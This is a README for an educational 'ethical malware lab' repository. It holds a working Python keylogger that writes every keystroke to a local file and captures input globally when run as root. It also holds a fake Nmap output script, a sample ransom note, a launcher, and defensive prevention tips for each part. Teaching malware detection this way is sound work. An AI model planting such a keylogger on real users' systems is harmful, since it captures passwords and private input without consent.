
Ethical Malware Lab simulates malware behaviors like keylogging, file manipulation, and infections for educational use. It helps users practice malware detection and removal in a safe, isolated environment. This project is for ethical hacking only, and should never be run on unauthorized systems.


Moorblocks421/ethical-malware-lab


ethical-malware-lab


Ethical Malware Lab

Author: [moorblocks421 or z3ro_x-)]
Project: ethical-malware-lab
Purpose: This lab simulates common malware techniques in a controlled, educational environment. It is designed for ethical hackers, cybersecurity students, and researchers who want to learn how malware behaves and how to defend against it — without endangering real systems.


Features

  • Simulated keylogging
  • Simulated network scanning
  • Simulated ransomware messaging
  • One-click script to launch the lab
  • Designed for Termux, Linux, or any POSIX-compliant shell

Lab Tools & Simulations

1. Keylogger (Simulated)

  • Path: keystroke/keylogger_sim.py
  • Description: Logs user keystrokes to a local file. Uses Python and the keyboard library.
  • Educational Purpose: Demonstrates how malicious keyloggers track user input.
  • Note: Run with sudo or root in Termux to capture input globally.

2. Network Scanner (Simulated)

  • Path: scanners/nmap_sim.sh
  • Description: Fakes a basic Nmap scan report.
  • Educational Purpose: Helps understand recon output and port enumeration.

3. Ransom Note (Simulated)

  • Path: exploits/ransom_note_sim.txt
  • Description: A harmless, fake ransom message displayed on lab launch.
  • Educational Purpose: Teaches how ransomware communicates and intimidates.

4. Lab Launcher Script

  • Path: start_lab.sh
  • Description: Launches the full lab with all simulated malware behaviors.
  • Use:
    bash start_lab.sh
    
  1. Keylogger Simulation Script

Keylogger Simulation Script (keylogger_sim.py)

This Python script simulates the behavior of a keylogger, logging user keystrokes.

    # keylogger_sim.py
    import keyboard  # Install with 'pip install keyboard'
    import time


    def log_keystrokes():
        print("Starting keylogger simulation... Press ESC to stop.")
        # Append each key-down event name to a local log file
        with open("keystrokes.log", "a") as log_file:
            while True:
                event = keyboard.read_event()
                if event.event_type == keyboard.KEY_DOWN:
                    log_file.write(f"{event.name}\n")
                    log_file.flush()
                    if event.name == 'esc':  # Stop on 'ESC'
                        print("Keylogger stopped.")
                        break


    if __name__ == "__main__":
        log_keystrokes()

Solution to Keylogger:

Preventative Measures:

  1. Use anti-malware software to detect and block keyloggers.

  2. Ensure that you only install software from trusted sources.

  3. Use on-screen keyboards and encryption when entering sensitive information.

  4. Regularly check your system for unknown processes or applications.


  1. Network Scanning Simulation Script

Network Scanner Simulation (nmap_sim.sh)

This bash script simulates a basic Nmap network scan. It does not actually perform a scan but outputs a simulated result.

    #!/bin/bash
    # nmap_sim.sh

    echo "Starting Nmap simulation..."
    echo "Simulating a basic network scan..."
    echo "--------------------------------------------------"
    echo "Nmap scan report for 192.168.1.1"
    echo "Host is up (0.0010s latency)."
    echo "Not shown: 999 filtered ports"
    echo "PORT STATE SERVICE"
    echo "22/tcp open ssh"
    echo "80/tcp open http"
    echo "443/tcp open https"
    echo "--------------------------------------------------"

Solution to Network Scanning:

Preventative Measures:

  1. Use a firewall to block unauthorized access to open ports.

  2. Disable unnecessary services (e.g., SSH, HTTP) on systems.

  3. Regularly audit your network for open ports using legitimate tools.

  4. Use intrusion detection systems (IDS) to detect suspicious network activity.
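
A sketch of the audit in measure 3, as an added example that is not part of this repository: parse a scan report in the format `nmap_sim.sh` prints and compare the open ports with what each host is expected to expose. The baseline is hypothetical and the sample report is copied from the simulated output above.

```python
import re

# Constructed sample: the report lines printed by scanners/nmap_sim.sh.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
"""

# Hypothetical baseline: the ports each host is supposed to expose.
BASELINE = {"192.168.1.1": {(80, "tcp"), (443, "tcp")}}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_report(text):
    """Return {host: {(port, proto): (state, service)}} from the report text."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {})
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current[(int(m.group(1)), m.group(2))] = (m.group(3), m.group(4))
    return hosts

def audit(text, baseline):
    """List open ports missing from the baseline and baseline ports not seen open."""
    findings = []
    for host, ports in parse_report(text).items():
        expected = baseline.get(host, set())
        open_ports = {key for key, (state, _) in ports.items() if state == "open"}
        for port, proto in sorted(open_ports - expected):
            service = ports[(port, proto)][1]
            findings.append((host, port, proto, "unexpected-open", service))
        for port, proto in sorted(expected - open_ports):
            findings.append((host, port, proto, "expected-not-open", ""))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_REPORT, BASELINE):
        print(finding)
```

Against the sample, SSH on 22/tcp is reported because it is open but absent from the baseline, which is the case measure 2 (disable unnecessary services) is meant to catch.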


  1. Ransomware Note Simulation

Ransom Note Simulation (ransom_note_sim.txt)

This text file mimics the appearance of a ransom note that might be displayed by ransomware. It is harmless.

ransom_note_sim.txt

!!!!! RANSOM NOTE !!!!!!!!

Your files have been encrypted. To get the decryption key, you need to pay 2 BTC. Failure to pay will result in permanent data loss.

Send payment to: [bitcoin-address]

DO NOT TRY TO RESTORE YOUR FILES USING BACKUPS - THEY WILL BE DELETED!

Solution to Ransomware:

Preventative Measures:

  1. Backup data regularly and store backups offline or on a cloud service.

  2. Use antivirus software with real-time protection.

  3. Educate users on recognizing phishing attempts that deliver ransomware.

  4. Keep software and systems up to date with the latest security patches.

  5. Enable file access restrictions and consider using disk encryption.


  1. Lab Launcher Script

Lab Launcher (start_lab.sh)

This script launches all of the tools in the Ethical Malware Lab, allowing for the full malware simulation experience.

    #!/bin/bash
    # start_lab.sh

    echo "Launching Ethical Malware Lab..."

    # Simulate Keylogger
    echo "Running Keylogger Simulation..."
    python3 keystroke/keylogger_sim.py &

    # Simulate Network Scan
    echo "Running Network Scanner Simulation..."
    bash scanners/nmap_sim.sh &

    # Simulate Ransom Note
    echo "Displaying Ransomware Note..."
    cat exploits/ransom_note_sim.txt

    echo "All simulations are running. Press 'ESC' to stop the keylogger."
    wait

Solution to Lab Launcher Security:

Preventative Measures:

  1. Use sandbox environments (e.g., virtual machines) to run malware simulations.

  2. Monitor the system carefully when running any malware simulation.

  3. Set up virtual networks to isolate any potentially dangerous behavior.

  4. Use a recovery plan that includes system snapshots for easy rollback in case of compromise.

  5. Educate system administrators on how to detect and respond to simulated malware.
